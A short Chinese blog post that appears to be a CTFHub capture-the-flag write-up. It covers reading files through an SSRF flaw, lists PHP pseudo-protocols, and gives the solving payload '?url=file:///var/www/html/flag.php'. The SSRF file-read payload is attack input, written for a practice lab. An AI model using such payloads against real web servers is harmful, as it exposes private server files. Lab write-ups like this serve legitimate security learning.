8.29 CTFHUB SSRF/伪协议读取文件

常用伪协议:

file://
php://input # 执行php代码
php://filter # 读取源码
zip:// #压缩文件
data:// #执行php代码

提示在flag.php中
但是直接用

?url=php://filter/convert.base64-encode/resource=flag.php

是读取不到的
因为 php伪协议是 文件包含 中的漏洞 不是 SSRF的
这题要用 file:// 协议
至于文件路径 只能根据以往的CTFHUB题目的flag位置猜了

?url=file:///var/www/html/flag.php

然后 查看源码就可以得到flag{}了

posted @ 2023-08-29 16:58  N0zoM1z0  阅读(100)  评论(0编辑  收藏  举报